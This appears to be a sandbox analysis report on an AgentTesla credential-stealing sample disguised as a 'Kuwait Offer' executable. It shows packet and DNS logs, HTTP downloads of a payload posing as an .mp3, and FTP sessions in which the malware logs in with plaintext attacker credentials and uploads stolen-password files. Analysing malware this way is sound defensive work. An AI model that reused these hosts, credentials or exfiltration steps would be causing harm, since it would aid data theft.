                                        Oct 8, 2024 08:56:19.916997910 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:19.917206049 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:19.917269945 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:19.917269945 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:19.917295933 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:19.917655945 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:19.917960882 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:19.918071032 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:19.918179035 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:19.918179035 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:19.918200970 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:19.918309927 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:19.937807083 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:19.937866926 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:19.937891960 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:19.937911034 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:19.937973976 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:19.937992096 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.004374981 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.004424095 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.004462004 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.004491091 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.004555941 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.004626036 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.004755974 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.004813910 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.004815102 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.004815102 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.004827976 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.005022049 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.005117893 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.005130053 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.005223989 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.005356073 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.005367994 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.005374908 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.005445004 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.005750895 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.005924940 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.005959988 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.005966902 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.006222963 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.006222963 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.009078979 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.009146929 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.009277105 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.009562969 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.009717941 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.009774923 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.009774923 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.009774923 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.009797096 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.010065079 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.010257006 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.010263920 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.010274887 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.010807991 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.010807991 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.028683901 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.028767109 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.095727921 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.095814943 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.095854998 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.095875025 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.095916033 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.095937014 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.095959902 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.096033096 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.096122980 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.096337080 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.096353054 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.096362114 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.096430063 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.096430063 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.096663952 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.096709013 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.096750975 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.096771955 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.096771955 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.096781969 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.096960068 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.096993923 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.097033024 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.097039938 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.097116947 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.097307920 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.097310066 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.097325087 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.097352028 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.097379923 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.097389936 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.097470045 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.097470045 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.097577095 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.097721100 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.097760916 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.097949028 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.097960949 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.097968102 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.098114014 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.127300978 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.127377033 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.186181068 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.186322927 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.186378002 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.186378002 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.186415911 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.186579943 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.186774015 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.186800957 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.186800957 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.186814070 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.186988115 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.187035084 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.187035084 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.187046051 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.187208891 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.187402010 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.187412977 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.187426090 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.187653065 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.187730074 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.187730074 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.187741995 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.187875032 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.188035011 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.188093901 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.188093901 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.188093901 CEST49856443192.168.2.967.212.175.162
                                        Oct 8, 2024 08:56:20.188107967 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.188177109 CEST4434985667.212.175.162192.168.2.9
                                        Oct 8, 2024 08:56:20.188380003 CEST4434985667.212.175.162192.168.2.9
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 8, 2024 08:55:57.441870928 CEST | 55344 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 08:55:57.684951067 CEST | 53 | 55344 | 1.1.1.1 | 192.168.2.9
Oct 8, 2024 08:56:01.013789892 CEST | 59360 | 53 | 192.168.2.9 | 1.1.1.1
Oct 8, 2024 08:56:01.235975981 CEST | 53 | 59360 | 1.1.1.1 | 192.168.2.9

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 8, 2024 08:55:57.441870928 CEST | 192.168.2.9 | 1.1.1.1 | 0x58d0 | Standard query (0) | wymascensores.com | A (IP address) | IN (0x0001) | false
Oct 8, 2024 08:56:01.013789892 CEST | 192.168.2.9 | 1.1.1.1 | 0xff1e | Standard query (0) | ftp.alternatifplastik.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 8, 2024 08:55:57.684951067 CEST | 1.1.1.1 | 192.168.2.9 | 0x58d0 | No error (0) | wymascensores.com | | 67.212.175.162 | A (IP address) | IN (0x0001) | false
Oct 8, 2024 08:56:01.235975981 CEST | 1.1.1.1 | 192.168.2.9 | 0xff1e | No error (0) | ftp.alternatifplastik.com | | 5.2.84.236 | A (IP address) | IN (0x0001) | false
• wymascensores.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.9 | 49717 | 67.212.175.162 | 443 | 7480 | C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 06:55:58 UTC | 82 | OUT |
    GET /dfsd/Wulwtq.mp3 HTTP/1.1
    Host: wymascensores.com
    Connection: Keep-Alive
2024-10-08 06:55:58 UTC | 209 | IN |
    HTTP/1.1 200 OK
    Date: Tue, 08 Oct 2024 06:55:57 GMT
    Server: Apache
    Last-Modified: Tue, 08 Oct 2024 03:42:59 GMT
    Accept-Ranges: bytes
    Content-Length: 957960
    Connection: close
    Content-Type: audio/mpeg


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.9 | 49800 | 67.212.175.162 | 443 | 7764 | C:\Users\user\AppData\Roaming\Hxfzsthbd.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-08 06:56:11 UTC | 82 | OUT |
    GET /dfsd/Wulwtq.mp3 HTTP/1.1
    Host: wymascensores.com
    Connection: Keep-Alive
2024-10-08 06:56:11 UTC | 209 | IN |
    HTTP/1.1 200 OK
    Date: Tue, 08 Oct 2024 06:56:10 GMT
    Server: Apache
    Last-Modified: Tue, 08 Oct 2024 03:42:59 GMT
    Accept-Ranges: bytes
    Content-Length: 957960
    Connection: close
    Content-Type: audio/mpeg


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.94985667.212.175.1624438144C:\Users\user\AppData\Roaming\Hxfzsthbd.exe
                                        Timestamp | Bytes transferred | Direction | Data
                                        2024-10-08 06:56:19 UTC | 82 | OUT | GET /dfsd/Wulwtq.mp3 HTTP/1.1
                                        Host: wymascensores.com
                                        Connection: Keep-Alive
                                        2024-10-08 06:56:19 UTC | 209 | IN | HTTP/1.1 200 OK
                                        Date: Tue, 08 Oct 2024 06:56:19 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 08 Oct 2024 03:42:59 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 957960
                                        Connection: close
                                        Content-Type: audio/mpeg


                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                        Oct 8, 2024 08:56:01.944909096 CEST | 21 | 49742 | 5.2.84.236 | 192.168.2.9 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220-You are user number 2 of 100 allowed.
                                            220-Local time is now 09:56. Server port: 21.
                                            220-This is a private system - No anonymous login
                                            220-IPv6 connections are also welcome on this server.
                                            220 You will be disconnected after 10 minutes of inactivity.
                                        Oct 8, 2024 08:56:01.945224047 CEST | 49742 | 21 | 192.168.2.9 | 5.2.84.236 | USER fgghv@alternatifplastik.com
                                        Oct 8, 2024 08:56:02.207434893 CEST | 21 | 49742 | 5.2.84.236 | 192.168.2.9 | 331 User fgghv@alternatifplastik.com OK. Password required
                                        Oct 8, 2024 08:56:02.210995913 CEST | 49742 | 21 | 192.168.2.9 | 5.2.84.236 | PASS Fineboy777@
                                        Oct 8, 2024 08:56:02.575886965 CEST | 21 | 49742 | 5.2.84.236 | 192.168.2.9 | 230 OK. Current restricted directory is /
                                        Oct 8, 2024 08:56:02.838076115 CEST | 21 | 49742 | 5.2.84.236 | 192.168.2.9 | 504 Unknown command
                                        Oct 8, 2024 08:56:02.838272095 CEST | 49742 | 21 | 192.168.2.9 | 5.2.84.236 | PWD
                                        Oct 8, 2024 08:56:03.226980925 CEST | 21 | 49742 | 5.2.84.236 | 192.168.2.9 | 257 "/" is your current location
                                        Oct 8, 2024 08:56:03.227145910 CEST | 49742 | 21 | 192.168.2.9 | 5.2.84.236 | TYPE I
                                        Oct 8, 2024 08:56:03.489248991 CEST | 21 | 49742 | 5.2.84.236 | 192.168.2.9 | 200 TYPE is now 8-bit binary
                                        Oct 8, 2024 08:56:03.489409924 CEST | 49742 | 21 | 192.168.2.9 | 5.2.84.236 | PASV
                                        Oct 8, 2024 08:56:03.751243114 CEST | 21 | 49742 | 5.2.84.236 | 192.168.2.9 | 227 Entering Passive Mode (5,2,84,236,216,8)
                                        Oct 8, 2024 08:56:03.760641098 CEST | 49742 | 21 | 192.168.2.9 | 5.2.84.236 | STOR PW_user-114127_2024_10_08_02_55_59.html
                                        Oct 8, 2024 08:56:04.457192898 CEST | 21 | 49742 | 5.2.84.236 | 192.168.2.9 | 150 Accepted data connection
                                        Oct 8, 2024 08:56:04.730727911 CEST | 21 | 49742 | 5.2.84.236 | 192.168.2.9 | 226-File successfully transferred
                                            226 0.273 seconds (measured here), 1.14 Kbytes per second
                                        Oct 8, 2024 08:56:14.738740921 CEST | 21 | 49821 | 5.2.84.236 | 192.168.2.9 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220-You are user number 3 of 100 allowed.
                                            220-Local time is now 09:56. Server port: 21.
                                            220-This is a private system - No anonymous login
                                            220-IPv6 connections are also welcome on this server.
                                            220 You will be disconnected after 10 minutes of inactivity.
                                        Oct 8, 2024 08:56:14.747215033 CEST | 49821 | 21 | 192.168.2.9 | 5.2.84.236 | USER fgghv@alternatifplastik.com
                                        Oct 8, 2024 08:56:15.010965109 CEST | 21 | 49821 | 5.2.84.236 | 192.168.2.9 | 331 User fgghv@alternatifplastik.com OK. Password required
                                        Oct 8, 2024 08:56:15.011281013 CEST | 49821 | 21 | 192.168.2.9 | 5.2.84.236 | PASS Fineboy777@
                                        Oct 8, 2024 08:56:15.298417091 CEST | 21 | 49821 | 5.2.84.236 | 192.168.2.9 | 230 OK. Current restricted directory is /
                                        Oct 8, 2024 08:56:15.566858053 CEST | 21 | 49821 | 5.2.84.236 | 192.168.2.9 | 504 Unknown command
                                        Oct 8, 2024 08:56:15.569318056 CEST | 49821 | 21 | 192.168.2.9 | 5.2.84.236 | PWD
                                        Oct 8, 2024 08:56:15.833127975 CEST | 21 | 49821 | 5.2.84.236 | 192.168.2.9 | 257 "/" is your current location
                                        Oct 8, 2024 08:56:15.833623886 CEST | 49821 | 21 | 192.168.2.9 | 5.2.84.236 | TYPE I
                                        Oct 8, 2024 08:56:16.098943949 CEST | 21 | 49821 | 5.2.84.236 | 192.168.2.9 | 200 TYPE is now 8-bit binary
                                        Oct 8, 2024 08:56:16.099241972 CEST | 49821 | 21 | 192.168.2.9 | 5.2.84.236 | PASV
                                        Oct 8, 2024 08:56:16.362982035 CEST | 21 | 49821 | 5.2.84.236 | 192.168.2.9 | 227 Entering Passive Mode (5,2,84,236,201,49)
                                        Oct 8, 2024 08:56:16.368763924 CEST | 49821 | 21 | 192.168.2.9 | 5.2.84.236 | STOR PW_user-114127_2024_10_08_02_56_12.html
                                        Oct 8, 2024 08:56:17.061897993 CEST | 21 | 49821 | 5.2.84.236 | 192.168.2.9 | 150 Accepted data connection
                                        Oct 8, 2024 08:56:17.326134920 CEST | 21 | 49821 | 5.2.84.236 | 192.168.2.9 | 226-File successfully transferred
                                            226 0.264 seconds (measured here), 1.18 Kbytes per second
                                        Oct 8, 2024 08:56:23.962723017 CEST | 21 | 49883 | 5.2.84.236 | 192.168.2.9 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                            220-You are user number 4 of 100 allowed.
                                            220-Local time is now 09:56. Server port: 21.
                                            220-This is a private system - No anonymous login
                                            220-IPv6 connections are also welcome on this server.
                                            220 You will be disconnected after 10 minutes of inactivity.
                                        Oct 8, 2024 08:56:23.963040113 CEST | 49883 | 21 | 192.168.2.9 | 5.2.84.236 | USER fgghv@alternatifplastik.com
                                        Oct 8, 2024 08:56:24.225641966 CEST | 21 | 49883 | 5.2.84.236 | 192.168.2.9 | 331 User fgghv@alternatifplastik.com OK. Password required
                                        Oct 8, 2024 08:56:24.226006985 CEST | 49883 | 21 | 192.168.2.9 | 5.2.84.236 | PASS Fineboy777@
                                        Oct 8, 2024 08:56:24.510798931 CEST | 21 | 49883 | 5.2.84.236 | 192.168.2.9 | 230 OK. Current restricted directory is /
                                        Oct 8, 2024 08:56:24.797842026 CEST | 21 | 49883 | 5.2.84.236 | 192.168.2.9 | 504 Unknown command
                                        Oct 8, 2024 08:56:24.798604012 CEST | 49883 | 21 | 192.168.2.9 | 5.2.84.236 | PWD
                                        Oct 8, 2024 08:56:25.061342001 CEST | 21 | 49883 | 5.2.84.236 | 192.168.2.9 | 257 "/" is your current location
                                        Oct 8, 2024 08:56:25.061484098 CEST | 49883 | 21 | 192.168.2.9 | 5.2.84.236 | TYPE I
                                        Oct 8, 2024 08:56:25.324621916 CEST | 21 | 49883 | 5.2.84.236 | 192.168.2.9 | 200 TYPE is now 8-bit binary
                                        Oct 8, 2024 08:56:25.324769974 CEST | 49883 | 21 | 192.168.2.9 | 5.2.84.236 | PASV
                                        Oct 8, 2024 08:56:25.588062048 CEST | 21 | 49883 | 5.2.84.236 | 192.168.2.9 | 227 Entering Passive Mode (5,2,84,236,243,93)
                                        Oct 8, 2024 08:56:25.599272013 CEST | 49883 | 21 | 192.168.2.9 | 5.2.84.236 | STOR PW_user-114127_2024_10_08_02_56_21.html
                                        Oct 8, 2024 08:56:26.304764986 CEST | 21 | 49883 | 5.2.84.236 | 192.168.2.9 | 150 Accepted data connection
                                        Oct 8, 2024 08:56:26.567184925 CEST | 21 | 49883 | 5.2.84.236 | 192.168.2.9 | 226-File successfully transferred
                                            226 0.262 seconds (measured here), 1.19 Kbytes per second

                                        Target ID:0
                                        Start time:02:55:55
                                        Start date:08/10/2024
                                        Path:C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\Desktop\Kuwait Offer48783929281-BZ2.exe"
                                        Imagebase:0xc80000
                                        File size:975'872 bytes
                                        MD5 hash:B77B84072A85329568EA006B1B7F4201
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1348809721.00000000030A7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1366255411.0000000006440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1357567810.000000000444C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1357567810.000000000444C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1348809721.000000000321B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1348809721.000000000321B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1357567810.0000000004069000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:02:55:58
                                        Start date:08/10/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                        Imagebase:0x200000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1476190069.0000000000602000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1476190069.0000000000602000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1480659431.00000000025EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.1480659431.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000002.00000002.1480659431.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:3
                                        Start time:02:56:09
                                        Start date:08/10/2024
                                        Path:C:\Users\user\AppData\Roaming\Hxfzsthbd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\Hxfzsthbd.exe"
                                        Imagebase:0xd0000
                                        File size:975'872 bytes
                                        MD5 hash:B77B84072A85329568EA006B1B7F4201
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1505492848.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1505492848.0000000003600000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1505492848.00000000037AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1478760914.00000000028AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.1478760914.00000000028AB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1478760914.00000000024F8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Antivirus matches:
                                        • Detection: 100%, Joe Sandbox ML
                                        • Detection: 34%, ReversingLabs
                                        • Detection: 28%, Virustotal, Browse
                                        Reputation:low
                                        Has exited:true

                                        Target ID:4
                                        Start time:02:56:11
                                        Start date:08/10/2024
                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                        Imagebase:0x580000
                                        File size:42'064 bytes
                                        MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1573523640.00000000028DE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.1573523640.000000000289C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.1573523640.000000000289C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:8
                                        Start time:02:56:17
                                        Start date:08/10/2024
                                        Path:C:\Users\user\AppData\Roaming\Hxfzsthbd.exe
                                        Wow64 process (32bit):true
                                        Commandline:"C:\Users\user\AppData\Roaming\Hxfzsthbd.exe"
                                        Imagebase:0x5f0000
                                        File size:975'872 bytes
                                        MD5 hash:B77B84072A85329568EA006B1B7F4201
                                        Has elevated privileges:false
                                        Has administrator privileges:false
                                        Programmed in:C, C++ or other language
                                        Yara matches:
